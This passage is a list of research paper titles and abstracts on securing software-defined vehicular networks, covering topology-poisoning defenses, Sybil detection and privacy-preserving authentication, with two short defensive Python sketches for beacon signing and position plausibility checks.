future 5G-VANET systems. By using vehicles as fog infrastructures and integrating them with local SDN controllers, the QoS of vehicular applications and protocols becomes more efficient in terms of computation time and communication delays.
This is explained by offloading the computing services from the cloud to the edge of networks, making use of the abundant resources offered by vehicles and making network control decisions locally. Through three typical use cases of our proposed 5G era vehicular architecture, we show the promising benefits of our approach in terms of communication and computation capacities. --- paper_title: Effective Topology Tampering Attacks and Defenses in Software-Defined Networks paper_content: As Software-Defined Networking has gained increasing prominence, new attacks have been demonstrated which can corrupt the SDN controller's view of network topology. These topology poisoning attacks, most notably host-location hijacking and link fabrication attacks, enable adversaries to impersonate end-hosts or inter-switch links in order to monitor, corrupt, or drop network flows. In response, defenses have been developed to detect such attacks and raise an alert. In this paper, we analyze two such defenses, TopoGuard and Sphinx, and present two new attacks, Port Probing and Port Amnesia, that can successfully bypass them. We then develop and present extensions to TopoGuard to make it resilient to such attacks. --- paper_title: SPHINX: Detecting Security Attacks in Software-Defined Networks. paper_content: Software-defined networks (SDNs) allow greater control over network entities by centralizing the control plane, but place a great burden on the administrator to manually ensure security and correct functioning of the entire network. We list several attacks on SDN controllers that violate network topology and data plane forwarding, and can be mounted by compromised network entities, such as end hosts and soft switches. We further demonstrate their feasibility on four popular SDN controllers. We propose SPHINX to detect both known and potentially unknown attacks on network topology and data plane forwarding originating within an SDN. SPHINX leverages the novel abstraction of flow graphs, which closely approximate the actual network operations, to enable incremental validation of all network updates and constraints. SPHINX dynamically learns new network behavior and raises alerts when it detects suspicious changes to existing network control plane behavior. Our evaluation shows that SPHINX is capable of detecting attacks in SDNs in realtime with low performance overheads, and requires no changes to the controllers for deployment. --- paper_title: FloodGuard: A DoS Attack Prevention Extension in Software-Defined Networks paper_content: This paper addresses one serious SDN-specific attack, i.e., the data-to-control plane saturation attack, which overloads the infrastructure of SDN networks. In this attack, an attacker can produce a large amount of table-miss packet_in messages to consume resources in both control plane and data plane. To mitigate this security threat, we introduce an efficient, lightweight and protocol-independent defense framework for SDN networks. Our solution, called FloodGuard, contains two new techniques/modules: proactive flow rule analyzer and packet migration. To preserve network policy enforcement, proactive flow rule analyzer dynamically derives proactive flow rules by reasoning the runtime logic of the SDN/OpenFlow controller and its applications. To protect the controller from being overloaded, packet migration temporarily caches the flooding packets and submits them to the OpenFlow controller using rate limit and round-robin scheduling.
We evaluate FloodGuard through a prototype implementation tested in both software and hardware environments. The results show that FloodGuard is effective while adding only minor overhead to the entire SDN/OpenFlow infrastructure. --- paper_title: Distributed denial of service attacks in software-defined networking with cloud computing paper_content: Although software-defined networking (SDN) brings numerous benefits by decoupling the control plane from the data plane, there is a contradictory relationship between SDN and distributed denial-of-service (DDoS) attacks. On one hand, the capabilities of SDN make it easy to detect and to react to DDoS attacks. On the other hand, the separation of the control plane from the data plane of SDN introduces new attacks. Consequently, SDN itself may be a target of DDoS attacks. In this paper, we first discuss the new trends and characteristics of DDoS attacks in cloud computing environments. We show that SDN brings us a new chance to defeat DDoS attacks in cloud computing environments, and we summarize good features of SDN in defeating DDoS attacks. Then we review the studies about launching DDoS attacks on SDN and the methods against DDoS attacks in SDN. In addition, we discuss a number of challenges that need to be addressed to mitigate DDoS attacks in SDN with cloud computing. This work can help understand how to make full use of SDN's advantages to defeat DDoS attacks in cloud computing environments and how to prevent SDN itself from becoming a victim of DDoS attacks. --- paper_title: FRESCO: Modular Composable Security Services for Software-Defined Networks paper_content: OpenFlow is an open standard that has gained tremendous interest in the last few years within the network community. It is an embodiment of the software-defined networking paradigm, in which higher-level flow routing decisions are derived from a control layer that, unlike classic network switch implementations, is separated from the data handling layer. The central attraction to this paradigm is that by decoupling the control logic from the closed and proprietary implementations of traditional network switch infrastructure, researchers can more easily design and distribute innovative flow handling and network control algorithms. Indeed, we also believe that OpenFlow can, in time, prove to be one of the more impactful technologies to drive a variety of innovations in network security. OpenFlow could offer a dramatic simplification to the way we design and integrate complex network security applications into large networks. However, to date there remains a stark paucity of compelling OpenFlow security applications. In this paper, we introduce FRESCO, an OpenFlow security application development framework designed to facilitate the rapid design, and modular composition of OF-enabled detection and mitigation modules.
--- paper_title: Towards software-defined VANET: Architecture and services paper_content: Vehicular Ad Hoc Networks (VANETs) have in recent years been viewed as one of the enabling technologies to provide a wide variety of services, such as vehicle road safety, enhanced traffic and travel efficiency, and convenience and comfort for passengers and drivers. However, current VANET architectures lack in flexibility and make the deployment of services/protocols in large-scale a hard task. In this paper, we demonstrate how Software-Defined Networking (SDN), an emerging network paradigm, can be used to provide the flexibility and programmability to networks and introduces new services and features to today's VANETs. We take the concept of SDN, which has mainly been designed for wired infrastructures, especially in the data center space, and propose SDN-based VANET architecture and its operational mode to adapt SDN to VANET environments. We also discuss benefits of a Software-Defined VANET and the services that can be provided. We demonstrate in simulation the feasibility of a Software-Defined VANET by comparing SDN-based routing with traditional MANET/VANET routing protocols. We also show in simulation fallback mechanisms that must be provided to apply the SDN concept into mobile wireless scenarios, and demonstrate one of the possible services that can be provided by a Software-Defined VANET. --- paper_title: Cost-Efficient Sensory Data Transmission in Heterogeneous Software-Defined Vehicular Networks paper_content: Sensing and networking have been regarded as key enabling technologies of future smart vehicles. Sensing allows vehicles to be context awareness, while networking empowers context sharing among ambients. Existing vehicular communication solutions mainly rely on homogeneous network, or heterogeneous network via data offloading. However, today’s vehicular network implementations are highly heterogeneous. Therefore, conventional homogeneous communication and data offloading may not be able to satisfy the requirement of the emerging vehicular networking applications. In this paper, we apply the software-defined network (SDN) to the heterogeneous vehicular networks to bridge the gaps. With SDN, heterogeneous network resources can be managed with a unified abstraction. Moreover, we propose an SDN-based wireless communication solution, which can schedule different network resources to minimize communication cost. We investigate the problems in both single and multiple hop cases. We also evaluate the proposed approaches using traffic traces. The effectiveness and the efficiency are validated by the results. --- paper_title: Data Offloading in 5G-Enabled Software-Defined Vehicular Networks: A Stackelberg-Game-Based Approach paper_content: Data offloading using vehicles is one of the most challenging tasks to perform due to the high mobility of vehicles. There are many solutions available for this purpose, but due to the inefficient management of data along with the control decisions, these solutions are not adequate to provide data offloading by making use of the available networks. Moreover, with the advent of 5G and related technologies, there is a need to cope with high speed and traffic congestion in the existing infrastructure used for data offloading. Hence, to make intelligent decisions for data offloading, an SDN-based scheme is presented in this article. 
In the proposed scheme, an SDN-based controller is designed that makes decisions for data offloading by using the priority manager and load balancer. Using these two managers in SDN-based controllers, traffic routing is managed efficiently even with an increase in the size of the network. Moreover, a single-leader multi-follower Stackelberg game for network selection is also used for data offloading. The proposed scheme is evaluated with respect to several parameters where its performance was found to be superior in comparison to the existing schemes. --- paper_title: A Scalable and Quick-Response Software Defined Vehicular Network Assisted by Mobile Edge Computing paper_content: Connected vehicles provide advanced transformations and attractive business opportunities in the automotive industry. Presently, IEEE 802.11p and evolving 5G are the mainstream radio access technologies in the vehicular industry, but neither of them can meet all requirements of vehicle communication. In order to provide low-latency and high-reliability communication, an SDN-enabled network architecture assisted by MEC, which integrates different types of access technologies, is proposed. MEC technology with its on-premises feature can decrease data transmission time and enhance quality of user experience in latency-sensitive applications. Therefore, MEC plays as important a role in the proposed architecture as SDN technology. The proposed architecture was validated by a practical use case, and the obtained results have shown that it meets application-specific requirements and maintains good scalability and responsiveness. --- paper_title: A security enforcement kernel for OpenFlow networks paper_content: Software-defined networks facilitate rapid and open innovation at the network control layer by providing a programmable network infrastructure for computing flow policies on demand. However, the dynamism of programmable networks also introduces new security challenges that demand innovative solutions. A critical challenge is efficient detection and reconciliation of potentially conflicting flow rules imposed by dynamic OpenFlow (OF) applications. To that end, we introduce FortNOX, a software extension that provides role-based authorization and security constraint enforcement for the NOX OpenFlow controller. FortNOX enables NOX to check flow rule contradictions in real time, and implements a novel analysis algorithm that is robust even in cases where an adversarial OF application attempts to strategically insert flow rules that would otherwise circumvent flow rules imposed by OF security applications. We demonstrate the utility of FortNOX through a prototype implementation and use it to examine performance and efficiency aspects of the proposed framework. --- paper_title: A Location Privacy Preserving Authentication Scheme in Vehicular Networks paper_content: As an emerging application scenario of wireless technologies, vehicular communications have been initiated not only for enhancing the transportation safety and driving experiences, but also for a new commercial market of on-board Internet services. Due to extraordinarily high mobility of vehicles in a vehicular network, frequent handover requests will be a norm, which initiates the demand for an effective and fast authentication scheme that can maintain the service continuity in the presence of frequent handover events.
However, previously reported authentication schemes, although with minimized handover latency and packet loss rate, may disclose the location information of the mobile user to a third party, which will seriously violate the location privacy of the user. In this paper, we propose a location privacy preserving authentication scheme based on blind signature in the elliptic curve domain. The scheme cannot only provide fast authentication, but also guarantee the security and location anonymity to the public. To analyze the proposed scheme, a theoretical traceability analysis is conducted, which shows that the probability of tracing a vehicle's route is negligibly small. We will also examine the authentication speed of the scheme, and show that the scheme can satisfy seamless handover for fast moving vehicles. --- paper_title: GSIS: A Secure and Privacy-Preserving Protocol for Vehicular Communications paper_content: In this paper, we first identify some unique design requirements in the aspects of security and privacy preservation for communications between different communication devices in vehicular ad hoc networks. We then propose a secure and privacy-preserving protocol based on group signature and identity (ID)-based signature techniques. We demonstrate that the proposed protocol cannot only guarantee the requirements of security and privacy but can also provide the desired traceability of each vehicle in the case where the ID of the message sender has to be revealed by the authority for any dispute event. Extensive simulation is conducted to verify the efficiency, effectiveness, and applicability of the proposed protocol in various application scenarios under different road systems. --- paper_title: An Efficient Identity-Based Conditional Privacy-Preserving Authentication Scheme for Vehicular Ad Hoc Networks paper_content: By broadcasting messages about traffic status to vehicles wirelessly, a vehicular ad hoc network (VANET) can improve traffic safety and efficiency. To guarantee secure communication in VANETs, security and privacy issues must be addressed before their deployment. The conditional privacy-preserving authentication (CPPA) scheme is suitable for solving security and privacy-preserving problems in VANETs, because it supports both mutual authentication and privacy protection simultaneously. Many identity-based CPPA schemes for VANETs using bilinear pairings have been proposed over the last few years to enhance security or to improve performance. However, it is well known that the bilinear pairing operation is one of the most complex operations in modern cryptography. To achieve better performance and reduce computational complexity of information processing in VANET, the design of a CPPA scheme for the VANET environment that does not use bilinear pairing becomes a challenge. To address this challenge, we propose a CPPA scheme for VANETs that does not use bilinear pairing, and we demonstrate that it can support both mutual authentication and privacy protection simultaneously. Our proposed CPPA scheme retains most of the benefits obtained with the previously proposed CPPA schemes. Moreover, the proposed CPPA scheme yields better performance in terms of computation cost and communication cost, making it suitable for use by the VANET safety-related applications.
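As a rough illustration of the pairing-free, elliptic-curve style of message authentication that the entry above argues for, the sketch below signs and verifies a safety beacon with plain ECDSA over P-256 using the pyca/cryptography package. It is not the cited CPPA construction: pseudonym issuance, the trusted authority, and conditional traceability are deliberately left out, and all function names and the beacon format are hypothetical.

```python
# Illustrative sketch only: standard ECDSA (no bilinear pairing) to show the
# shape of pseudonym-based beacon authentication; NOT the cited CPPA scheme.
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives import hashes
from cryptography.exceptions import InvalidSignature

def make_pseudonym_keypair():
    """A vehicle would hold one short-lived keypair per pseudonym."""
    private_key = ec.generate_private_key(ec.SECP256R1())
    return private_key, private_key.public_key()

def sign_beacon(private_key, beacon: bytes) -> bytes:
    return private_key.sign(beacon, ec.ECDSA(hashes.SHA256()))

def verify_beacon(public_key, beacon: bytes, signature: bytes) -> bool:
    try:
        public_key.verify(signature, beacon, ec.ECDSA(hashes.SHA256()))
        return True
    except InvalidSignature:
        return False

if __name__ == "__main__":
    sk, pk = make_pseudonym_keypair()
    beacon = b"pos=48.117,11.601;speed=13.9;t=1700000000"
    sig = sign_beacon(sk, beacon)
    print(verify_beacon(pk, beacon, sig))         # True
    print(verify_beacon(pk, beacon + b"x", sig))  # False: tampered beacon
```

The point of the sketch is only that per-message signing and verification can be done with ordinary ECC primitives; the cited schemes additionally bind pseudonyms to a real identity so that misbehaving vehicles remain traceable by the authority.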
--- paper_title: Fast and Secure Multihop Broadcast Solutions for Intervehicular Communication paper_content: Intervehicular communication (IVC) is an important emerging research area that is expected to considerably contribute to traffic safety and efficiency. In this context, many possible IVC applications share the common need for fast multihop message propagation, including information such as position, direction, and speed. However, it is crucial for such a data exchange system to be resilient to security attacks. Conversely, a malicious vehicle might inject incorrect information into the intervehicle wireless links, leading to life and money losses or to any other sort of adversarial selfishness (e.g., traffic redirection for the adversarial benefit). In this paper, we analyze attacks to the state-of-the-art IVC-based safety applications. Furthermore, this analysis leads us to design a fast and secure multihop broadcast algorithm for vehicular communication, which is proved to be resilient to the aforementioned attacks. --- paper_title: Towards resilient geographic routing in WSNs paper_content: In this paper, we consider the security of geographical forwarding (GF) -- a class of algorithms widely used in ad hoc and sensor networks. In GF, neighbors exchange their location information, and a node forwards packets to the destination by picking a neighbor that moves the packet closer to the destination. There are a number of attacks that are possible on geographic forwarding. One of the attacks is predicated on misbehaving nodes falsifying their location information. The first contribution of the paper is to propose a location verification algorithm that addresses this problem. The second contribution of the paper is to propose approaches for route authentication and trust-based route selection to defeat attacks on the network. We discuss the proposed approaches in detail, outlining possible attacks and defenses against them. --- paper_title: The impact of malicious nodes positioning on vehicular alert messaging system paper_content: ICT components of vehicular and transportation systems have a crucial role in ensuring passengers' safety, particularly in the scenario of vehicular networks. Hence, security concerns should not be overlooked, since a malicious vehicle might inject false information into the intervehicle wireless links, leading to life and money losses. This is even more critical when considering applications specifically aimed at improving people's safety, such as accident warning systems. To assess the scenario of such type of applications in a vehicular network, we have performed a thorough evaluation of accident warning systems under a position cheating attack. As one of the main contributions of this paper, we determine the impact of a different number of malicious vehicles on delaying the alert warning messages. In particular, we study the impact of the position of malicious vehicles on delaying alert messages. We identify the most effective strategies that could be used by malicious vehicles in order to maximize the delay of the alert message, and thus strengthen the impact of the attacker. Finally, we pinpoint that even with a small number of malicious vehicles, the positioning cheating attack can significantly increase the delay of the alert message when compared to a scenario without attack. 
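In the spirit of the position-verification defenses discussed in the surrounding entries, the following illustrative sketch (not taken from any cited paper) checks whether a neighbor's claimed position is plausible given a coarse distance bound derived from received signal strength. The log-distance path-loss constants, the tolerance factor, and the example values are all hypothetical.

```python
# Illustrative sketch (hypothetical parameters): receiver-side plausibility
# check comparing a claimed position against an RSSI-derived distance bound.
import math

def rssi_to_distance(rssi_dbm, tx_power_dbm=20.0, path_loss_exp=2.7, ref_loss_db=47.0):
    """Coarse distance estimate (metres) from RSSI via a log-distance model."""
    path_loss = tx_power_dbm - rssi_dbm
    return 10 ** ((path_loss - ref_loss_db) / (10 * path_loss_exp))

def claimed_distance(own_xy, claimed_xy):
    return math.dist(own_xy, claimed_xy)

def position_plausible(own_xy, claimed_xy, rssi_dbm, tolerance=2.0):
    """Flag a claim whose geometric distance exceeds the RSSI bound by `tolerance`x."""
    return claimed_distance(own_xy, claimed_xy) <= tolerance * rssi_to_distance(rssi_dbm)

if __name__ == "__main__":
    own = (0.0, 0.0)
    print(position_plausible(own, (60.0, 45.0), rssi_dbm=-75.0))    # True with these constants
    print(position_plausible(own, (900.0, 500.0), rssi_dbm=-55.0))  # False: claim far beyond bound
```

Single-observation RSSI checks of this kind are noisy, which is why the surveyed schemes combine them with multiple observers, traffic patterns, or statistics gathered over time.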
--- paper_title: Improved security in geographic ad hoc routing through autonomous position verification paper_content: Inter-vehicle communication is regarded as one of the major applications of mobile ad hoc networks (MANETs). Compared to other MANETs, these so-called vehicular ad hoc networks (VANETs) have special requirements in terms of node mobility and position-dependent applications, which are well met by geographic routing protocols. Functional research on geographic routing has already reached a considerable level, whereas security aspects have been vastly neglected so far. Since position dissemination is crucial for geographic routing, forged position information has severe impact regarding both performance and security. In order to lessen this problem, we propose a detection mechanism that is capable of recognizing nodes cheating about their position in beacons (periodic position dissemination in most single-path geographic routing protocols, e.g. GPSR). Unlike other proposals described in the literature, our detection does not rely on additional hardware or special nodes, which contradicts the ad hoc approach. Instead, this mechanism uses a number of different independent sensors to quickly give an estimation of the trustworthiness of other nodes' position claims without using dedicated infrastructure or specialized hardware. The simulative evaluation proves that our position verification system successfully discloses nodes disseminating false positions and thereby widely prevents attacks using position cheating. --- paper_title: AWF-NA: A Complete Solution for Tampered Packet Detection in VANETs paper_content: In vehicular ad hoc networks (VANETs), it is vital to ensure that tampered data packets, especially safety-related ones, are detected and stopped from further propagation. To this end, we propose a novel scheme, autonomous watchdog formation enabled by 2-hop neighborhood awareness (AWF-NA), to ensure that nodes automatically function as watchdogs to monitor the behaviors of the relaying nodes. Unlike existing schemes [1-4], it aims to detect and react at each hop, and stop any tampered packet from further propagation in spite of dishonest watchdogs and relaying nodes. At each hop, the neighbors of the relaying node and the receiver node autonomously select eligible watchdogs among themselves based on local information provided by 2-hop neighborhood awareness. With 2-hop neighborhood awareness each node knows all the neighbors within its 2 hops, which provides it with necessary information to act according to the heuristic rules in AWF-NA. Induction-based proof shows that AWF-NA can detect all potential attacks of data packet tampering. Theoretical analysis indicates that it achieves a good balance of desirable performance and authentic packet relaying. --- paper_title: An efficient service channel allocation scheme in SDN-enabled VANETs paper_content: Providing infotainment services in Vehicular Adhoc Networks (VANETs) is a key functionality for the future intelligent transportation systems. However, the unique features of vehicular networks such as high velocity, intermittent communication links and dynamic density can induce severe performance degradation for infotainment services running on the six Service Channels (SCHs) available in the Dedicated Short Range Communication (DSRC).
Although the Wireless Access in the Vehicular Environment (WAVE) has been proposed for VANETs to support these applications and guarantee the QoS by proposing four different access categories, no service channel scheme has been proposed to ensure fair and interference-aware allocation. To fill this gap, in this work we propose ESCiVA, an Efficient Service Channel allocation Scheme in SDN-enabled VAnets to balance service traffic on the six SCHs and mitigate interferences between services provided on adjacent channels. Extensive simulation results confirm that ESCiVA outperforms the basic SCH allocation method, defined in the WAVE standard. --- paper_title: Detection and localization of sybil nodes in VANETs paper_content: Sybil attacks have been regarded as a serious security threat to ad hoc networks and sensor networks. They may also impair the potential applications of VANETs (Vehicular Ad hoc Networks) by creating an illusion of traffic congestion. In this paper, we present a lightweight security scheme for detecting and localizing Sybil nodes in VANETs, based on statistic analysis of signal strength distribution. Our scheme is a distributed and localized approach, in which each vehicle on a road can perform the detection of potential Sybil vehicles nearby by verifying their claimed positions. We first introduce a basic signal-strength-based position verification scheme. However, the basic scheme proves to be inaccurate and vulnerable to spoof attacks. In order to compensate for the weaknesses of the basic scheme, we propose a technique to prevent Sybil nodes from covering up for each other. In this technique, traffic patterns and support from roadside base stations are used to our advantage. We, then, propose two statistic algorithms to enhance the accuracy of position verification. The algorithms can detect potential Sybil attacks by observing the signal strength distribution of a suspect node over a period of time. The statistic nature of our algorithms significantly reduces the verification error rate. Finally, we conduct simulations to explore the feasibility of our scheme. --- paper_title: A Robust Detection of the Sybil Attack in Urban VANETs paper_content: The Sybil attack is one of the most serious attacks on Vehicular Ad Hoc Networks (VANETs), because it severely damages the security of VANETs and even leads to a threat to the lives of drivers and passengers. In this paper, we propose a solution to detect the Sybil attack based on the differences between the normal motion trajectories of vehicles and the abnormal ones. In our approach, each node can accomplish the attack detection independently with the limited assistance from the infrastructures of VANETs. We improve the feasibility of our approach with limited infrastructures at the early deployment stages of VANETs. In addition, the independency and feasibility of our algorithm are more robust than the existing solutions that rely on collaboration of neighboring nodes. Simulation results show that the proposed method outperforms the existing solutions in terms of robustness, detection rate, overhead efficiency, and lower system requirements. --- paper_title: A sybil attack detection approach using neighboring vehicles in VANET paper_content: Vehicular Ad Hoc Network (VANET) is vulnerable to many security threats. One severe attack is the Sybil attack, in which a malicious node forges a large number of fake identities in order to disrupt the proper functioning of VANET applications.
In this paper, a distributed and robust approach is presented to defend against the Sybil attack. The proposed scheme localizes the fake identities of malicious vehicles by analyzing the consistent similarity in neighborhood information of neighbors of these fake identities. Beacon packets are exchanged periodically by all the vehicles to announce their presence and become aware of neighboring nodes. Each node periodically keeps a record of its neighboring nodes. In the proposed approach, each node exchanges groups of its neighboring nodes periodically and performs the intersection of these groups. If some nodes observe that they have similar neighbors for a significant duration of time, these similar neighbors are identified as Sybil nodes. The proposed approach is able to locate Sybil nodes quickly without the requirement of secret information exchange and special hardware support. We evaluate our proposed approach on a realistic traffic scenario. Experimental results demonstrate that the detection rate increases when optimal numbers of Sybil nodes are forged by the attacker. --- paper_title: Anomaly traceback using software defined networking paper_content: While the threats in the Internet are still increasing and evolving (like intra multi-tenant data center attacks), protection and detection mechanisms are not fully accurate. Therefore, forensics is vital not only for recovering from an attack but also for identifying the responsible entities. Therefore, this paper focuses on tracing back to the sources of an anomaly in the network. In this paper, we propose a method leveraging the Software Defined Networking (SDN) paradigm to passively identify switches composing the network path of an anomaly. As SDN technologies tend to be deployed in the next generation of networks including in data centers, they provide a helpful framework to implement our proposal without developing dedicated routers like usual IP traceback techniques. We evaluated our scheme with different network topologies (Internet and data centers) by considering distributed attacks with numerous hosts. --- paper_title: FRESCO: Modular Composable Security Services for Software-Defined Networks paper_content: OpenFlow is an open standard that has gained tremendous interest in the last few years within the network community. It is an embodiment of the software-defined networking paradigm, in which higher-level flow routing decisions are derived from a control layer that, unlike classic network switch implementations, is separated from the data handling layer. The central attraction to this paradigm is that by decoupling the control logic from the closed and proprietary implementations of traditional network switch infrastructure, researchers can more easily design and distribute innovative flow handling and network control algorithms. Indeed, we also believe that OpenFlow can, in time, prove to be one of the more impactful technologies to drive a variety of innovations in network security. OpenFlow could offer a dramatic simplification to the way we design and integrate complex network security applications into large networks. However, to date there remains a stark paucity of compelling OpenFlow security applications. In this paper, we introduce FRESCO, an OpenFlow security application development framework designed to facilitate the rapid design, and modular composition of OF-enabled detection and mitigation modules.
FRESCO, which is itself an OpenFlow application, offers a Click-inspired [19] programming framework that enables security researchers to implement, share, and compose together, many different security detection and mitigation modules. We demonstrate the utility of FRESCO through the implementation of several well-known security defenses as OpenFlow security services, and use them to examine various performance and efficiency aspects of our proposed framework. --- paper_title: GSIS: A Secure and Privacy-Preserving Protocol for Vehicular Communications paper_content: In this paper, we first identify some unique design requirements in the aspects of security and privacy preservation for communications between different communication devices in vehicular ad hoc networks. We then propose a secure and privacy-preserving protocol based on group signature and identity (ID)-based signature techniques. We demonstrate that the proposed protocol cannot only guarantee the requirements of security and privacy but can also provide the desired traceability of each vehicle in the case where the ID of the message sender has to be revealed by the authority for any dispute event. Extensive simulation is conducted to verify the efficiency, effectiveness, and applicability of the proposed protocol in various application scenarios under different road systems. --- paper_title: VeCure: A practical security framework to protect the CAN bus of vehicles paper_content: Vehicles are being revolutionized by integrating modern computing and communication technologies in order to improve both user experience and driving safety. As a result, vehicular systems that used to be closed systems are opening up various interfaces, such as Bluetooth, 3G/4G, GPS, etc., to the outside world, thus introducing new opportunities for cyber attacks. It has been recently demonstrated that modern vehicles are vulnerable to several remote attacks launched through Bluetooth and cellular interfaces, allowing the attacker to take full control of the vehicle. The common root cause of these attacks is the lack of message authentication for the vehicle's internal bus system, called Controller Area Network (CAN). In this work, we propose VeCure - a practical security framework for vehicular systems, which can fundamentally solve the message authentication issue of the CAN bus. VeCure is designed to be compatible with existing vehicle system architectures, and employs a trust group structure and a novel message authentication scheme with offline computation capability to minimize online message processing delay and deployment cost. We built a proof-of-concept prototype on a testbed using Freescale's automotive development boards. The experimental results show that VeCure only introduces 50us additional delay to process a message, which is at least 20-fold faster than any existing solution. --- paper_title: Detection and localization of sybil nodes in VANETs paper_content: Sybil attacks have been regarded as a serious security threat to ad hoc networks and sensor networks. They may also impair the potential applications of VANETs (Vehicular Ad hoc Networks) by creating an illusion of traffic congestion. In this paper, we present a lightweight security scheme for detecting and localizing Sybil nodes in VANETs, based on statistic analysis of signal strength distribution. Our scheme is a distributed and localized approach, in which each vehicle on a road can perform the detection of potential Sybil vehicles nearby by verifying their claimed positions. 
We first introduce a basic signal-strength-based position verification scheme. However, the basic scheme proves to be inaccurate and vulnerable to spoof attacks. In order to compensate for the weaknesses of the basic scheme, we propose a technique to prevent Sybil nodes from covering up for each other. In this technique, traffic patterns and support from roadside base stations are used to our advantage. We, then, propose two statistic algorithms to enhance the accuracy of position verification. The algorithms can detect potential Sybil attacks by observing the signal strength distribution of a suspect node over a period of time. The statistic nature of our algorithms significantly reduces the verification error rate. Finally, we conduct simulations to explore the feasibility of our scheme. --- paper_title: GSIS: A Secure and Privacy-Preserving Protocol for Vehicular Communications paper_content: In this paper, we first identify some unique design requirements in the aspects of security and privacy preservation for communications between different communication devices in vehicular ad hoc networks. We then propose a secure and privacy-preserving protocol based on group signature and identity (ID)-based signature techniques. We demonstrate that the proposed protocol cannot only guarantee the requirements of security and privacy but can also provide the desired traceability of each vehicle in the case where the ID of the message sender has to be revealed by the authority for any dispute event. Extensive simulation is conducted to verify the efficiency, effectiveness, and applicability of the proposed protocol in various application scenarios under different road systems. --- paper_title: Detection and mitigation of sinkhole attacks in wireless sensor networks paper_content: With the advances in technology, there has been an increasing interest in the use of wireless sensor networks (WSNs). WSNs are vulnerable to a wide class of attacks among which the sinkhole attack poses severe threats to the security of such networks. This paper proposes two approaches to detect and mitigate such attacks in WSNs. It provides a centralized approach to detect suspicious regions in the network using a geostatistical hazard model. Furthermore, a distributed monitoring approach has been proposed to explore every neighborhood in the network to detect malicious behaviors. Our simulation experiments validate the correctness and efficiency of the proposed approaches. --- paper_title: P2DAP — Sybil Attacks Detection in Vehicular Ad Hoc Networks paper_content: Vehicular ad hoc networks (VANETs) are being increasingly advocated for traffic control, accident avoidance, and management of parking lots and public areas. Security and privacy are two major concerns in VANETs. Unfortunately, in VANETs, most privacy-preserving schemes are vulnerable to Sybil attacks, whereby a malicious user can pretend to be multiple (other) vehicles. In this paper, we present a lightweight and scalable protocol to detect Sybil attacks. In this protocol, a malicious user pretending to be multiple (other) vehicles can be detected in a distributed manner through passive overhearing by a set of fixed nodes called road-side boxes (RSBs). The detection of Sybil attacks in this manner does not require any vehicle in the network to disclose its identity; hence privacy is preserved at all times.
Simulation results are presented for a realistic test case to highlight the overhead for a centralized authority such as the DMV, the false alarm rate, and the detection latency. The results also quantify the inherent trade-off between security, i.e., the detection of Sybil attacks and detection latency, and the privacy provided to the vehicles in the network. From the results, we see our scheme being able to detect Sybil attacks at low overhead and delay, while preserving the privacy of vehicles. --- paper_title: Detecting Sybil attacks in VANETs paper_content: Sybil attacks have been regarded as a serious security threat to Ad hoc Networks and Sensor Networks. They may also impair the potential applications in Vehicular Ad hoc Networks (VANETs) by creating an illusion of traffic congestion. In this paper, we make various attempts to explore the feasibility of detecting Sybil attacks by analyzing signal strength distribution. First, we propose a cooperative method to verify the positions of potential Sybil nodes. We use a Random Sample Consensus (RANSAC)-based algorithm to make this cooperative method more robust against outlier data fabricated by Sybil nodes. However, several inherent drawbacks of this cooperative method prompt us to explore additional approaches. We introduce a statistical method and design a system which is able to verify where a vehicle comes from. The system is termed the Presence Evidence System (PES). With PES, we are able to enhance the detection accuracy using statistical analysis over an observation period. Finally, based on realistic US maps and traffic models, we conducted simulations to evaluate the feasibility and efficiency of our methods. Our scheme proves to be an economical approach to suppressing Sybil attacks without extra support from specific positioning hardware. --- paper_title: Distance-Based Scheme for Broadcast Storm Mitigation in Named Software Defined Vehicular Networks (NSDVN) paper_content: The computer networking field is evolving day by day and new techniques like named data network (NDN), software defined network (SDN) and vehicular ad-hoc networks (VANETs) are gaining attention due to their enhanced functionalities over traditional networks. NDN is a new paradigm which mitigates the IPv4 addressing limitations due to its better and more flexible mechanism. In NDN, communication between different nodes occurs with the help of content names rather than IP addresses. On the other hand, SDN provides more control and manages the network efficiently by decoupling the data and control planes. Communication in VANETs comprises two parts: (i) V2V (vehicle-to-vehicle) and (ii) V2I (vehicle-to-infrastructure). In V2V, communication between different vehicles is carried out by the vehicles themselves, while in V2I it is done through road side units (RSUs). The broadcast storm problem occurs when the same packets are flooded by every vehicle. With the help of both NDN and SDN in VANETs, the broadcast storm problem can be solved. In this paper, we introduce a new technique named Broadcast Storm Avoidance Mechanism (BSAM) to mitigate the broadcast storm issue. The proposed scheme is evaluated through simulations, which show that BSAM outperforms native VNDN in terms of the average number of Interest packet transmissions and the average end-to-end delay. --- paper_title: Mobility management approaches for SDN-enabled mobile networks paper_content: The evolving network technologies aim at meeting the envisioned communication demands of future smart cities and applications.
Although software-defined networking (SDN) enables flexible network control, its applicability to mobile networks is still in its infancy. When it comes to introducing the SDN vision to mobile networks, handling of wireless events and mobility management operations stand out as major challenges. In this paper, we study the scalability issues of SDNized wireless networks, specifically those relevant to mobility management. We design and implement different mobility management approaches in SDNized wireless networks and investigate the impact of various system variables on the overall handover delays. We also study the improvements in handover delays: (i) when a proposed proactive mobility management algorithm is implemented; (ii) when the controller delegates partial control of mobility management to the forwarding entities. For the implementation of the proposed approaches on the OpenFlow network, the paper also suggests potential extensions to the OpenFlow protocol. The contributed approaches are validated on a full-scale demonstrator, with results showing that proactive outperforms reactive and that the delegated control approach performs better than proactive for smaller topology sizes. Furthermore, a proposal for LTE X2-specific control delegation is discussed as a use case. --- paper_title: Delay-Minimization Routing for Heterogeneous VANETs With Machine Learning Based Mobility Prediction paper_content: Establishing and maintaining end-to-end connections in a vehicular ad hoc network (VANET) is challenging due to the high vehicle mobility, dynamic inter-vehicle spacing, and variable vehicle density. Mobility prediction of vehicles can address the aforementioned challenge, since it can provide a better routing planning and improve overall VANET performance in terms of continuous service availability. In this paper, a centralized routing scheme with mobility prediction is proposed for VANET assisted by an artificial intelligence powered software-defined network (SDN) controller. Specifically, the SDN controller can perform accurate mobility prediction through an advanced artificial neural network technique. Then, based on the mobility prediction, the successful transmission probability and average delay of each vehicle's request under frequent network topology changes can be estimated by the roadside units (RSUs) or the base station (BS). The estimation is performed based on a stochastic urban traffic model in which the vehicle arrival follows a non-homogeneous Poisson process. The SDN controller gathers network information from RSUs and BS that are considered as the switches. Based on the global network information, the SDN controller computes optimal routing paths for switches (i.e., BS and RSU). While the source vehicle and destination vehicle are located in the coverage area of the same switch, further routing decision will be made by the RSUs or the BS independently to minimize the overall vehicular service delay. The RSUs or the BS schedule the requests of vehicles by either 